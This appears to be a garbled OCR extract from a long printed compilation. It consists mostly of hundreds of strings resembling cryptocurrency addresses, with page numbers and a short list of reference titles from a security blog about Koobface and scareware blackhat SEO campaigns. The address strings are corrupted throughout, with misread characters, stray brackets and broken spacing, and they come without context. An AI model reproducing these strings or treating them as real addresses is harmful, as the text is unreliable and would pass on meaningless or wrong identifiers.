LEDQN53PjKU7E451lypJe8LU8G1wWT6RgVAB 
LEBqaqr7WMgyv]Js8wokxi6vKiK9FiFonemV 
LEBQqYsbmXBDDWWULu69XiGTRud3PvkC2t 
LEBuBVsT2GkKMTFbZUthnhA7UTXXNNAPrkf 
LEbDUEdu6p6068Qd6CeFBSZ94woifR7R7eT 
LEBuFFDrL2Qomfio22XspzK5sWaHRb2AC1 
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LEBUPWD5H4YFnLQUbxHbhhdVsAR4yfNhgX 
LEBVBEaqD34dCwPyxXYVttuVm7H9g6XsC8u 
LEbvVjcLPQjJZHB4qQ2ALY6P36Mqn4AqQ3h 
LEbXBthPrUxc8mChgVwM7iY5mFXVWBXbBR 
LEBXopfh7cRCUf9Jc834H)JGSM9ZgUWBBoL 
LEbytsQeDKX7LxXUsnFy8Ld7rSAFtAvdQP 
LeBZqTSLQnLTP53aUTAKnNwPBZR6vi8ep 
LEbZVuDZPVGEHanUyaF]p6kDBUgfRPiJ8n 
LEC58zP3TApYjQmLOEobpQFU9L8PTftc7m 
LEc5a7gNU2vttPVbivp1j4ZF7734v9sovp 
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1EcaZuNsLXh4KXKK293Vmt8ZWPbK6Qkkux 
LECECLWDCpi8RQ7nn15A3UMfaZcktJlocf 
1LEcFha4eskhybmmouEttWUE6vTPeYSEFRa 
LECiIA5448yHYkcjoW5GQAUQry2H3KALoDD 
LEcINDLQTQHTFHDe4hD8FerRNwWV38R2NoM 
LECj9FQGJ vsGywBWWepbEHxA9brDGhB4eZ 
LEcjvVZMVMR6aQKKnvzmTShMT 3rbj3ZMQ6p 
LECMBAeQKMZpwakL2MgpcYnjJeFxj1XrADk 
LECMCs7Mnrei3m5csbeCb1QMrcarV8DQDm 
LECMDMYzTPVm3g6PKSqBxivGW66K9kGFrv 
LECMiNVwerGBRyrho8yioonJdjCZBjHu7y 
LECMZw171cEx34C5THJMBUk26f3p7D8PrP 
1ECoerMF6GHnyHgS9xCS1MRSJoAfsF7Uky 
LECQwic8PCeRB7b6YG7CUrTjNyMSZwk4e} 
LECrQX7g8QnPdXzmwV3fwkgogtjYZ1WGkQ 
1LEcrSsJ29AsSKkUKrzJcJkKQWYh6rNTqsqnw 
1LEcS3eunRpNDyskPgj1lAZArKVhJ6pe9S2b 
LECT9yLvnUVVCqgidDgQXbKqJ3k6CEvSf6Xx 
LECTyibKMASXHD7urYrCwsUvntVAZiSCWA 
LECtyMAbqHhsmyWqvPVE6cbPjNDUgwh/7f2 
LECUZeqcRukJPeodNjJScLpiyFwUmBbqbFu 
LECVaHweUnNBcvjFGaTsJuFVfFNoa8uNUD 
LEcvENbfzzqCqh1VQczWJCHXWpkKooPALqy 
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LEcXygUkn8cxcHCTT23eSmW1uecJmFAzg6 
LEcZpx26KASqXCy6MyXoltu8yb5Zw56hZi 
LEcZWfhuKgEwzkPCR99YSEZSPCWQGdww9W 
1LEd1pKk3uq8dG9UH9361q2xtKRTBSt5UYA 
LEd2dUS6yQy3UHPkPfvuYwWpSGEm1FHS7V 
LEd7rENmrxdmhszgfpKMtav5DF5p8ynuoF 
1LED7SGBd1ly1tv65nU884DvYmn8ZqUmPKAr 
LED8jeRcPxo3P1leLnuhsHSWnpTCiznFmwG 
1LEdaCj4eLDPgnLic2qUQdpycJeU6qZGEDQ 
leDbbSSMoEJBVaEbkE1KAA3hd7mVUxn1f 
LEDDMtxBGyY2AhmGGi3y8y]p3nn2z5DDSG 
1EDdzoFDs1Mmv52rCC3JgmLru7vCrds4m5 
LEDe2nEcvG4TgEsJFiZaZ5Y6QmrxbvcSsU 
LEDfLQSzpfp7X5fs4MwriL6VBimNC2j5y2 
LEDhbqWwc1u8HEQn9SRzx4dK2CC4RTubcEW 
LEDHnPpqQ1iCmyMMZUHXDVNiKVxCJQnn6EU 
LEdJagaJC7LjbyPy 75WyNnwQCVvfnhj7Bjy 
LEAMYYkKnE81CYpXGdQJ9PWeBSvuqH19wGg 
1LEDntthKztvK4vxX2Vfhydy9SZmFwwGv5ZS 
1EdoCCDeMi5PtBnBc2zxRDrySutM5PtY7S 
LEdP4aiF5sk44ELSPanHPiZpaxUZKc3CzA 
LEDPWSVaZdKafDC1KXZoqqWbsZ7Q7xhQZF 
LEdQFWs3Xwrop7XF6XYa7TQTYCQCjUM81Y 
1LEdris7bGdTFUMpgzsg6t4K2zY 3htvPbjJU 
LEDs3CPULyTmDrw3Jubzozdr4mW8EY4943 
LEDt2 FQFUWnNHONHJGQvco5ktDRv69L7gm4 
LEdw6iJXi56D2cH2T6iVVS4QjFR4mM9msb3 
LEDYVkHacKAiQrooAdRx8FGk8ftxXyie2dd 
LEDYyttMFbo4V2jLpiL7ZJr9VifnHLdTgi 
LEDZBArNa1Q5gsK1ikKDKJtGAh7PBkgaYNV 
LEDZoxso9HLejxHEygd6qyscY9TRiYIcJQ 
1Ee3Gu39Rhswmh8LRukzrA2YSF9YGZwAv5 
1EE6J1Hek9JZmMG5dKvjjD3JRKHTEprCT8M 
LEe6kAYWizdFG7bxiHY8W3NsgbCceU91U7 
LEeAcHArAnLFCyrretGYenZVKhvKvP4Htr 
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LEEBVU3NZFMhz5EWEpRrERvP9eEW1pfQwa 
LEeCT9Q2xaYxfLJQP6JBgaEZUwGjEG1kY6 
LEEdqhcZAZdhfbymKY584MtkE9RQCpffh5 
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1LEes5Rf71fv3N2sHthFnqyaSJs2MjTgpjC 
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LEEu54U2X5ALeiNjGwWUZFM2XoigHG8kCfy 
1EEuue5kaj7UDDvCkcKR5KrwDGGdkKstitX 
LEEVmrKkLP7LmBVrrX9YAP3JwKVh31Covx 
1Eex1fZZBPwkHj9bZGT4QZTegajqoYQbEY 
LEEXEBpzBVDUC9x8ZW90ohRtL1Hi29keRqT 
1EexUcwBa9PPeZcFe1L42snjsMGKehv1irt 
LEEY5XuX4zC4W4qLWo5wB5y878vqcHh2kW 
1LEeYJ9CGYvbosHZJiEg44x2xGhvhTgePUV 
1LEeYkJmdwTcUKmnfjcYN3D5utN1Gr479cG 
1EeZou7bjicSeo4kMqJKEYVZ7xBC3P6jwj 
1Eezsd6vvu2XFa6Hz8BaV47PYoTRwjcE6a 
LEF1liTQdkqhUeZ3tA4L9UqEakZixJnQavr 
LEf3dLdQePDqRnE8s2yxNTCYZYHXFFbDjP 
LEf9rhrecpU85ZkZsxKRLUS7GrgweHgdjw 
LEfatd597JgWcuWs305Hof4h4kKZswb3y6D 
LEfAvVtpM1U7Q76s94UVWJ21pXu6UfNcouS 
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LEfBuyl1U3TRmM1Im9vAM4aprvR1Zk6eDmaAa 
LEfoW8ePKRnXGustLkPDhrMGseCKpQuWQ2 
1LEFessvEaZvCe5vbeWofZgyHxdSs7Zph65 
LEfGLkaSn96jBFqpouppAYP2XwoG8Qkxm4 
LEFIMYGbDLO6Bb8nBnBQPr2fWYCTGC8MhHE 
LEfizrqg/9mAy10577EZr2TtpmBhsyAE9vd 
LEfjmM6HBKy 7HpUoYD3CEm14GvupLDdYXvK 
LEFKCVsGW62cwbEdMt7HtTsBnedHfflb1R 
LEFKQp8CU7yCmp3u9WisqGcVLZT9y9IQi6Z 
LEfPDKUaxaqCcAHEq6esjSb39WypRPWUA4 
LEfpedUNtFVWZduYTY60MbuYZ8Y1LRMmXkNt 
LEFPvwkfj5fpUqJ6vjKqHVs7G1VKZQq61W 
LEfq55ABBDj]itrDf3aH3F9NCvFjJSpM7uss 
LEFqyTr4imWQgKNGuwNjRwg57MzYV1gXZM 
LEfRFCZQydaBdpsdh7znT19CgsAe8S24AK 
LEfsEatjq8c6iZAlJyYD6182GVz4yppC6F 
LEfske54hUgEQU3cfaNkjBGEnmMVJC2cJN 
LEfSYUZ5ed7U7yPM6rhFqoV5xCzaFnGTg2 
lLeftFtPqbFXTF789sNKL2fiABiIEWKJgRY 
LEFW5aGT5YfXdsMy8AZ36grK2Vrb45kpp3 
LEfy2r7jxYy5KSUduS7QkT48pJitoF54RE 
LEFZSv1YeSS1LNs902jsWwWV4JLUgQE9Tw 
LEG3KP7wDFJG4UmkKjLw44hFEZiwhfpAmef 
LEg4wQEwzxXadAfsxH5a2rpzU3tWhD32mAE 
LEg8qYEV75Rxo0ZrGmYdkFgojMbtG2JwNrx 
LEG9CIQQMNu5PLf8RimF5FVPYHu6bpsgD) 
LEgA1TVXQAVm8VpTKvUd8Jt5tHSA8ahano 
1LEGa3bicxhiiprVPBf9D6mJDgrpDUeC2tt 
LEgaY6XZK7Ta8RF624Eb2wXYaRZFKik2Q1 
LEgaZjobwF53yknoXGESA1ZKYnthzqa5R3U 
LEgC6UVtbUgSxY38Nbi3zeMF6p6FUafh6M 
LEGeqHU2Tv1scaPKrQjBp6hi8Ckt2sQFLK 
LEgFnnvEC) 7MME2ctFFEQwpC2Sa2FPvrHS 
LEGFvHHhZZTmEdFzcYwqv8wDDW6mkK9re6C 
LEGFwzrY1B7qzWm2rqD6EZcUZEYk3bjDbM 
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LEGG 7eQrq9b4rcmLF7g3JhD897KdLNcvae 
LEggB3rvFGCQ3b2TAgF2KbUghbuGjbmhEX 


LEGGDMaG7hbtLXGVMRKwMkdpqZbUWEm6BX 


LEghmNkh8Lz5yyVgQJTjLchFDTwfvzBotn 
LEgiRdikLXhwkxal1MBDyrEQ8NDMtLLTQs 
LEgiXsDqPnNQH2HdAUa4e7 9DpW3ghnMh2Bj 
LEGKVPJbJ5nz9LHK5X2p5iYmqxnbWJFEwP 
LEglVyH7WiYc5bGfvaqwDekKXUkQiSUSg1 
LEgLYxmujb6FgM4xXbAqNZrwi4WK4DpPad 
LEgnm5BbAE5T5kwn9GKuviSPnr8HsstqkKQ 
LEgnzzfB5XxXfjEul2bFS4tcL4tm3pai8hc 
LEgoHcv8Pfkfh3aqT FkKBSNKwDé6édrVHzPPr 
LEGPuxh2VwJmMZ30MPcSGTBWvdqcoNgqz 
LEgRWvjmphpZnJKn9SQp7LU9dGXuJGo9kr 
1LEGs3f4yCcKSKHBWSFFZBogBMbnvFHQdgD 
LEGvzn3TPiv6éryZvcWUTX6zr7wvPQWudKY 
LEGW9aQJbzzLGsYTGtknB5XnsqUueswpi4v 
LEgzEPAZb5et6W1hf5Vpahn8DMitrPPErq 


LEgZNPCUVMKxp9HzZoSZW6ZKGCfdm3Qw3Q 
LEH6Qmz7ejONGjpT9I2WVmMMQ8VFMR3xmQ2K 


1LEH8091eEns20vFW8hXoTBDykx3Yy2UEk6 
LEhAfUAJMS6iG1Gj4NuS73ES)KyrftGZ8s 
LEHb8BxVxgPPNnohmv6yuP67T5MZQDqFw1 
LEHDekpezMZRNHM3HFH7o0gk992J6mh6A4f 
LEHEcjnMXgT6uX2bESV9OnJAPWWD6f76gkg 
LEhFAUyzeqJ/K9ZhxHdP4ybMAQwgq9a8D9XN 
LEhgFUJZs33bRC2sfkC93JT3WZGPhL7t7S 
LEHjcjsP17ZPNHMWT9tAZ5X39AZUTVGWEQ 
LEHjnddmmEJiHqvJTPXi4hPjAAXt7 DAmTt 
LEHLBGFwt9W2z7j3LALQNE9K7Q25BjPxdPw 
LEHMfqWPEgmtTatyytUGF7bd3uBcpFUjQb1 
LEhmo3mLB8whY2Xw3nyoVirknMMB6GBJB7 
LEhP6P3SNngVKUVMB7mjtQT6EnV8GtSUJr 
LEhpv4ct4vuknwFJbfnnDg90CrcYZduJF2 
LEHR4jxhSfXMCyDeqtUrcARSYd3YddtDs6 
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LEHR82SKpWs3HczozoMm3AMnhuGRxTZ7p3 
1EhrnRyaaigPMKhKyfkbjiaNkKMK6BFCdDH 
LEHRPJ9vf5dv4C1B8NAHxo03KTg5607DbXB 
LEHSoY6GTvhtWPmK3LCi3R8SJxgEtvTRH2 
LEHsSYv6fxcExoXg6eustCXdDAG6di8SJvTR 
LEHu1ZpHEkrLEPfDDUvQ3DYgMBNaffy3Yk 
LEHV6xdilRLicFkRQn2P1r3jZvooC1KYTc 
1LEhwCbyfvdqGFK1zbQLbu6vmLSQh1j1B48 
LEhXy5ff]/CBGjuaTTCKudKVRUUQTnNG3Gox 
LEI2A5rLh7EVH3QtA7eedgamSdsExUmhLF 
LEI9tqptZYtuHRFZBNEECQ7RL8w7MXDSB6 
1EiaegjduFjS5FcM9JwaqsCr3kwuJM5vasj3 
LEiIC6e9RCCJEQMp59MKLtyGZZZokoFZQCg 
LEiIEUSkKLjh6QynkRRnrFY7FkK592vwTQzdT 
LEIGF3Ci2EJNDMKaecsWqGXuQiT VfFrgdXx 
LEiINVM8HOKD6MjyDRMFhsQKvajGpdgTfjQ 
LEIJIBMqgQvyTUyTNiBZ3PTciggnmDtyxAur 
LEikkJwPnt6PSnqsVSHMPrZZtECFJ6MDon 
LEIL9Yiot L4Uj8LSDH2X84ZyzQqatedv5HC 
1LEiu3A3Kkup7XrjCquJHujq3L5fuxXSVsRp 
LEiv6eRqKgJadESkxMTZ1FZTMAeFxgPYJH 
LEivuBECFyaGEnjngnceEkGRwbiYAjPRER 
LEivuyNGyaJJZcGc5Mxi5fAzzdyL4hUkf8 
LEiWtaZvDZtXAnjckkkzjnatsudv3WpvxXr 
LEiIXjnNDHA7QMTKxMV8EAMQ9zfsy3YFGhggs 
1Ej16cbpgpnUAHJ6hYyG8dnEDi7KDQzVos 
LEj19QqSqNdtdCqwaLxmxHv7dzBNZhfv4v 
1LEj1lv966cs8qTGXJwALGHo6XxKiYwbmQxXB 
LEj57pAHYPL95gHx1XMTTW7Pk7YWb7hSuZ 
LEJ5waNv6ébQT4UcaWkika325vVYvRz4eBb 
LEJB8nW5Q8dVKP4Jf48N7poN8Gj9bajJtxV 
LEJ8m9ayqJ9qmGikHHLszxss4Fzqz8uHWg 
LEJ80pbi3Stprg38YuQ1LxPhxzPJTQbu4mD 
LEJCKDx3YmiTPQcQrU7xw93uzRYjz6iaX6 
LEJeM4ndNegs3CgEv64cDnVkYAIM1F9jTL 
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LEJF6EPNG16WjafiWWoC1DL8Rz1TPKBzJUQ 
1LEJfhwt3fo4YKLWQFEa9cpv4QyC6qPpWif 
1EJGRDPyRGdHuqwaamLCl1AxbvW88AdZMe8 
LEjHaeeTcK31Q1fkxxwR22EzflQeZ9kUpZ 
1EJilPuaYPSHSB5soYUQ1muCoRSZepRdCo 
LEjiqnHZxBktLloGUcGn4XJdjTf6Z31Zfr7 
LEJjPrfSQ2ZqrmfeR6bYVDbrKXh13LEyPC 
LEJNH4NoZqbS75JvAsHoPZp6eXybFwYLsE 
LEjoQZ5Rz0c3ZiJcP2doHxDh3NyZpGdhx5 
LEjqdpHdxxTPQKpQZSbbAVgwpXaPWRYZpf 
LEJQpJIVHRMPIQQ5nioGpEFIdvoQ8NomWk 
LEjJRFR9C2cUT5hDdkJJ9PE3xmYx8jd6dpD 
LEjJRN4cB87wFSGUbarUozFoT3E3Arrulya 
1EJVbsbG45vWDbRhRZ85ydxzaXSYAz3VcD 
LEJWAUKDZoXbNjTQU21UEtHAEDbnDT12zw 
1LEJy5ePAce7YS9LVuStvZCqdojoKu2hAdo 
LEk27aNw67QuZjjZigqclrobtWkuMeFAMFz 
1LEK574BNuwXgWr3KiKMT9PhPMmP4N3k9teG 
LEKaDXxWLKSYTcyrZYALN8bhaPRUByg3wM 
LEKBfxjrwKsXLqfook3YNsXr9Vj8mGtfXF 
LEkbUgB7gr1WRSz8rdSsA2YsAPD4XCBmC9 
LEKc4uQ3q4dF83tYSnPkv3upQvXKeXLBDb 
LEKDaXeR4wjgXBHMHMEeCUsd69hc6fkCBr 
LEKdXWq2RZqPKyfgY2FhzVSNGhkJB3aSc} 
LEkg4YM7tQ8ijcAyZASSfHHPUEn6jjkSb3 
1EkgRepetj/KRUVNdV3852Bd7A16XYkbdfU 
LEKGWUPen10Ar4ik3zPHv8685m36HV896b 
LEKHm2fb8bsKBunBwvkrbH9bfsRV2yg64t 
LEKjJT39PDkKNGQHMGzQrzv3ip6buHR8GGtwV 
LEkkaksVmrrCQqsf3h5kovVKeghbVaVZ3i 
LEkkgm1o8BCdLN2Nrr6fUdDCgAaGhelbs9 
LEKKVCWq5CX6KF2xYqBVyTZQJvZYEbMnTM 
LEKM5BtfiFPUW2ZgaN7Td5bN7gKg1GYft3 
LEKNZrsFiRPHHEzSvfwgiE7ZuXnjfVYyr3 
LEKPiv8aNP4wG2D5u5FrwCj62MtAHLJ977 
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LEkpXj8mDLxb7B7N6tTPg6GUdngPBs1tDm 
LEkrKXDpNKgRTU7YHWf9Jhjgq7DuBTuLL3 
1LEkRybFwdrB9ZCqu9VH7kncaLptzWhCmEg 
LEks8MwgDufn6uPLTGP8fp2nyc2HMVwiug 
LEKSXB8wk32K3jW70RFt78dHVoTnQ4y163 
LEKtjb4UJNYoyKEeVEnnFLqSqHTFVnuA5N 
LEktpvcfCPPyqbuRGyL6UkDgJHWDJQAScQ 
LEKVYKNRCS1ZP5WTUCkKDgCxf3uG6osrJyh 
LEkyo4jJcgpsp9HMAYaV2qgDGQzJCEVmBTB 
1EkzLm6ceD59mSdxEXQB1rUeM4HnTYAAnNH 
LEKZNkZnsjcnasH21ZDiCyz6rHGuQvLTHr 
LEL8Wb63wWEvMTsa6pxPFtwbLf29tYeNsMX 
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LELm9vDpkVQRrNCeAu8CZpFwNgRiJyPy6R 
LELmy96usgDVzcdyMpmYP5UES4RQZTWXkZ 
LELn9F6LoOVmKuvjuv7girtaL4dBTziML7h 
LELOHX3FdK2n6dsqRAcpwbnFxmz4DwiZi4 
LELqd9tgNdS7Ct4BEi9DxiznH7oRiGfZrq 
LELqeKPJF9cDxZ7B2ZJEMhE1XtVtAA7Hf3 
LELRhoSgskUbAP3G1gJdDbEoT4BAN5EkGt 
LELTZFcJCNcyPkx2cWKnV3binb6fKcZQbE 
LELUDDGoPNL5882w9M7NzwsiPtu1L6sLYS 
LELUNakqR4mPoptNzfEHcXRAeeb6ygT4kqe 
LELUocTovrxSoQCo5b1gGmDsdX2fxzRjfk 
LELyzdZwGAem9bR2iZDfmWEUURW9W64yhw 
LEM3ut3PhZqc1x5wt47hzNP6umHZ6j5Mnt 
LEM6xrtAbw94DGastP5KfGxQ5b2vjiJdBQ 
LEM8wUBy6sQ6gw4GcjLoduerQMv9t98TxN 
LEMAawBR51AAUD4JELvLofjSTB71fq4jP8 
LEMcGVkGfvpjbzry4ozvdgSNEWiUrmgFa4 
LEmdZ3mnzdicuGwGRZyovSaqrx4]Hk2HG]} 
LEmFUVunegj7EyQF8QzeuNrkybxLoiQBBF 
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[28]Dissecting the Latest Koobface Facebook Campaign 


[29]The Koobface Gang Mixing Social Engineering Vectors 


Ukrainian "fan club" and the Koobface connection: 
[30]Dissecting a Swine Flu Black SEO Campaign 
[31]Massive Blackhat SEO Campaign Serving Scareware 
[32]From Ukrainian Blackhat SEO Gang With Love 

[33]From Ukrainian Blackhat SEO Gang With Love - Part Two 


[34]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and 
Blackhat SEO Farms 


[35]From Ukraine with Bogus Twitter, LinkedIn and Scribd Accounts 


[36]Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign at Blogspot 


This post has been reproduced from [37]Dancho Danchev’s blog. 
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LESfszTwDZeKilb TeNA8JCXwcRi5NbtYqG 
LEsG5qSmdg8jM2oJokmBaxKU2URjchQCm 
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LEVN8Kq6gX6QM4dC7bRgid9jhJLDVaQQeR 
LEvqQbwXVivqnxKp9QN3bYU1X4291bMRNu 
LEvro3Cqdzb72t4Efhfn4nFprULM4Axbi6 
LEVVE5TE3V20283jeoBWtZSEEQGMytCow} 
LEVVNViENecDbux3pwENeAoP6DD7L7GWNT 
LEvVWM1vtqPurmkdhudJ9x1VBjS5YVJF5ag 
LEVZtPpwlubaSPH8u2J4pQuYpQgceuZ205 
LEVZxQXyiH42hH4r3Nz8cMMmU4C2rAVssq 
LEw43FyLVyQvHkB8czDB7ppKRnYbNVMhnP 
LEw5j3PikAuajP4LLiaDGycxA6HM2yhUSb 
LEWbfxT5bZCm3fdPXUDB3SNAEPABzZWDyDS 
LEwCcZqCi3Fte777)Mrd9yzkyx9cAAufEw 
LEWcTb5cnqY2c2Tj/HH3ZRe7qwnRrbQer:xi 
LEWDZDvjyzAnGDu9ECeeEarxCbqNBUp8E7 
LEWfZVPZtvNf4viPyzZKsJux6ynM5L9vf2 
LEwixU3QpL7y7S6iaaZ1peskrLdfBWmJr3 
LEwje2 ToaJDAUMKG8Z06j8Z123ZLhSSHBi 
LEWJtEDUQZUSUYBwZGjaJYY4ndUKhQLEGn 
LEWkqhxvqeKAQ8uagk9n6nhRaNrsVZys Ty 
LEWM8yeY36WFUJHRNiIQp4kPz3TZXNDePwu 
LEWN4ANAaNi91F7E5YFCBK8YdEP73pNuNcf 
LEWNyJgrrt LKKWhZAJQsUoxu3wo7pcf7tt 
LEwP2GCRdMypftLuuqP6WMNHsRkd6nf4G1 
LEwpTbasWBvHd1pWEgAQJZyvdsUwjCdGqt 
LEWpTPRddP263vjWw5ux5dGcm2VmVHSfWp 
LEWQ01i74tKpTKUMuitMkcsYPX4Rthrcgy 
LEWQPEKSjjT6vjGiHVFsyopoDukwtjsdub 
LEwrNyRUdkpPrpzMyCaC6Fy60B TowYkhTw 
LEWssZjZq9qdbzAeFgHyCuoKFbG5LqwvxT 
LEWtrAp9Y9d2FkXBqXeuZNrYwEgFGlvxyv 
LEwTvEedo8ibB189Z8cXVZFMquZM59Hdjs 
LEwUNZd55tuDtczydmkvoL7vx6kPpukSpx 
LEWURtrQUJ596PKjrGAgriX97Je79Dgql7 
25550 


1LEwXbufmzxTpvhcb876h91BwQ7FYiTdHUk 
LEWXEvF3uBqPUKo6FefwZfR5P8vVUF3hnv1 
LEWygSUwt2wTaotWNvAAgmwzcn5CFqk3Nj 
LExlmnBgxpj2wxqL2DkWwst4zsTEJfupk9 
1EX2z3xKuFBOouNLgyz5WRTYSYQy63EdECW 
LEX7CWehUiiINLmMS2BmsQhEimoNeRZJtHgg 
LEx7WqaE2m3xVZqF4Wjx9mRsaKkqycSGetg 
LEx8FSxZadjPluqCvCrbnCKz1xr6é6wutKq 
1LEx9X1dtbzL3KNJmXcExeUxoHYyQ8DbiEa 
LExadqgZZrmB1zQaa8eQynQs5FGHSEJYz9 
LEXcbgPiBc4XisULgeJ6n69Jwphbuq6P5y 
LExdErDZf] cDBiEqhLCt8s12eA4iUPtjCP 
LEXdhF2qFpsDWhcZ45fHjS9UcoL8F1FSv9 
LEXEgmgkr19xxbVt946B4j1VK9Zmxuhm7b 
LEXEHhieAjozBcyEql11HhXc4cxposPFTp 
LExF6mmpoFRsyYk6or8ybwtS8mk9F3YUDI 
1LExFByibncRoT6YVqkbbNNuwZyhxPFST1W 
LExfwWe4s2aYfKVkku1xHF7cWvdfAaoE8b 
1LExG4Sbnergb9ParZahNaycEZSpb6N7)JBb 
LEXGQipPohVz69gESyn2JH58VnkQjJVuek9 
LExJDCCotWxnHob3CUnP7ZzrWwYDUzzZm4 
LExn49mGsDqL3tbikYogCVPvRSaeyTgxaqf 
LExpnEZBqXWaqNQcY2AQFXvQX3MBXh1kk8w 
LEXr8MxbJr9zb56VAZ1XSbxMzgs]pYFijB 
LEXTcmMKoE42BPRGvsGhK2VkF2w6HGc2E06 
LEXU7TRA3WMjSXfvUmDd5SqqPeNQ772)mf 
LEXuATwYinHJaGiDYPrUuBE1F2X2LWjWvV 
LEXuXaAJK7857kpMgkN3BE2SYckp6bNC4n 
LEXZarZgiqU3Li9F4tsxTWSEweLJUhnMzmY 
LEY1k4MeDEUMhjuYqPnFH8SxmAsZFfEJ2f 
LEY2UkPeVuzrv3cyZeQ7PADDPsMirBgCMe 
LEy4NpXuGkGKZG7AUDpv3mjj1ls8Ec3sf2A 
LEY4074BfuzfcmKAe3momAEwCrcPQPRveM 
LEY56C9SZK8XwYmM4u4SY7SRWdofm8vDAUu 
LEy82vaVo3RmC9SnLCKBRzxHPubUXbD1ne 


25551 


LEYAhV5iSxLnh7EZp9T7zcga8TDAruiGhG 
LEYau8qrc7Tz2h82mCgZnBbJ4mKsxBEFyV 
LEyC4t1PmF3BvNv2nMDPviDF4pJbAZXQSS 
LEydnfxZECDbVMWhkwi6EydYaeNLJxxxYq 
LEYe5qiMHRZhkpfQeLGAXbhcdU98JBHgyT 
LEYEmASy2TSiFocCHi3AiBozrr5TKgSTC 
LEyeTkE1HyDJ8DuDpGHfa7J7s90A2CDkLU 
LEYfu2uvszAalxUweu6SmGptgDvkxt3faq 
LEYFYKT6HxHoxitmjBDZaLA5Ah1zhYicxXW 
LEYk7yxXi4SGboDQn9z1xmgG6dq8RspNrzm 
LEykvuNLFhxW9y34bcyLSEvr92GQHnBx2F 
LEYmkCu2JiEAgqNf5a7kKDhF8cX9PwYpgF6 
LEyNoagZyGi9G4ntcgyT3rZa2vy3qyTpVn 
LEyokhsQ2TZV929RTzdRxcYZrosGfyW3j7 
LEYPcXighpHpEQiknPz2wLXeHz5H3V30mf 
LEYPtddbNFR35XMRWgQksWArkZ4rwrpNal 
LEYQwqC2kSYrqXZrKbXJShjjLhXXbhWLZf 
LEYQyLgL9hpjrczVXMePNe8Ti4NzZHvdTY] 
LEYR27YGHeogFYUEKpwM7hnmLnaiM9yhlv 
LEYSKAj9fFHSGHTTKR32A9YBZVRi7HdU8td 
LEYtbSC6A6CpC1kQksSeTAOWHGi8htBZST 
LEYtePkb5iKZTbmSnjABdQ4jmKgZmh9hqge 
LEyVdbucjmT5Jm8rjMALViINLSYBCmkng4T 
LEyVTq9nWYS6BWSgHhts140AxGV71GPm34 
LEYYp230dosACe7Pjy3X7UMmKSqMQnBLTCS 
LEYYvocW9SDZJoWTj3iYn8N4XzZ5M8W8MSo 
LEzbcRNG1CNDGNuwL9Jo7mMKXyQKExrWLvG 
LEZbow5Ko6YAfrRXQRQwmiugxUcWwAvC9s 
LeZHRr2EP1014mCcJxm5FhZx4MpPCgaQ8 
LEZiuTrfdNzh1639niSqUmFiJz3tQeS8SQ 
LEzjmyiYr5vCWuV4M8ZXzjuSU3MjfALVKk 
LEZKH36W28f4yiTDUUZMDqr3no06XB4VLnq 
LEZLXv1VRVY1TAqcvP6DXzeohDTkTEn2m9 
LEZmMB83wFJBJNmMXG2Ch2A5DAY9YcY6caTV7 
LEznuxN9XhnmSDxjsqPmMBUpNWQLLSByXPH 
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8. http://cotamagat .files.wordpress.com/2007/11/kukuruku. jpg 
9. http://www.virustotal.com/analisis/7b64f366eb5eb2befc0c601146cce076af782c527 1c84£30593dbe98c84e9e06- 12506 
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2558 


LEzoppkGfl1MTB6U3NsaypS2Dq916EuTzn6 
LEzpk32Mnyw7YgrP84sE5o0)Vnfbgkhx3ns 
LEZpUSCDV80C59GzxzyoYwXekoFiSXJSU6 
1LEZsdngLgmyV33Lfen5UnMfcYGtADr7Ua5 
LEZt3kKKLMY7XawSQRk3P7WZnFSQeS3EEyr 
LEZTRDnXbPs54KL4rEFVCizgSPw8X8Jcwa 
LEZXUU9f]g6s1QBbDtzqcLHZwgeTWaqDreG 
LEZYAEX5XojxxJbOQCRfqpu8yRrtn3Ezq9D 
LEzyXsYaArs98F4xAPDB1fSYffaop4cKBP 
LEZZS4v2ynE2zgmMtFj5HKcxkc]XMePtH3 
1F12RoazrPn9hPaw2U1uqPFkMheuyk2gAi 
1FlaVRWQzgSt3pBZKv9WrTEKS9D5sdAdfT 
1F1BeszZPJsVbtkBQNbpsgVF6qy7Ms2GQh 
LF1LhAvjXmCxHAaW5ifUUhD2idBrsocaEgi 
1F1lhusf5mGer3LmK4ZJLBJ8Z15VxjnY9mMA 
1FilmaThkZaAhLjftMEhQjWKHXmTVN2q9Vb 
LFimgqT8ffVJKNtE1gVJ4t4FvhXqy6zGth} 
1F1pd6yGLx1AB9LJJVjsy1P4idMzBgWiNB 

LF lucZHNFWkUWDQd5YK4W8juHG8yUzccyv 
1F1Xfvn3ZGrYUfhumNL7fbRLtIrr2 76 TehE 
1LF1XGAEZiiZW1xxujD2L247CsEm357E5bK 
1F1xiqEAexNS8fhznZ4VF 7rnWDMmvTmZPz 
1LF25hmcJofmHjZZYeHNZR72V1kTDr4XBTQ 
1F27XP9ntqYit8xs81P3K9TDcLT WjHQerj 
1f2AmnuCUpyGCqboWUWrvLsSqAm9WPym4 
1F2CaqQPCwgLapZyaayqBJS75fzYzhv7v5 
1LF2EBfpDajrfjgivsVKMP7Ju3V59PwS9nY 
1LF2ghkthh7dTK9PN7U6K8TukVcyKsZ4WcY 
1F2KTS4rRkdbQhnsKN8GjpLdXzpVs5KWRb 
1F2Lddpd2yzwF8nKwZURDhEpdRggwMfDtr 
1F2LUXVZBn5qmXzmM5eyvxBtjamkjeNb6a 
1LF2SWavtxPAwhVuxCiZbzT6v6X2G5bxgJk 
1F2WyAHV6ukFAHsc4F19b6XjkLKyn8wTSc 
1F345bzWhGgf3gEPoKRifH8ZJKk644tAh7 
1F34BihrcPSxE8iVKtTdobZYPXgfdFuLgqR 


25553 


LF39mmiCZr2eDbPj2gTyDgiujagZW9FJbk 
1F3cQNX9vgNKRXqD6palANXAxHyN71zphd 
1F3DeWDD98NWMxqgrqWwRmVLvLqkEFeuYfQ 
1F3e3g25UCemeowLP98VTi3FtLePymeKGy 
1F3nQyBcGxPh2TsUsyd5rDYKNGh9tnhqrS 
1LF3RTFx8dvcuASnZSaAEGBitBDJFou4xcw 
1F3Sxd2YgiTSwK35Y9dTkjzPeNC267Bodn 
1F3zqDRjLNbshk9TgAvMnztmdXNTme9N2N 
1F44FRBw7JPKvuHJvVYi2XcCPjAtY8NvVu 
1F44Shxjz5M6hzvReUxQVPu3PCaPCLQhAP 
1F47cVg9impp7 1duAscsLgNpSBWFuvXRcn 
1F4AvL33aBotGmFCaJKPBY8VsxSVLWKRBF 
1F4baxwA8ZP9h2NZGYcw7Wkxvhq2dg9tdV 
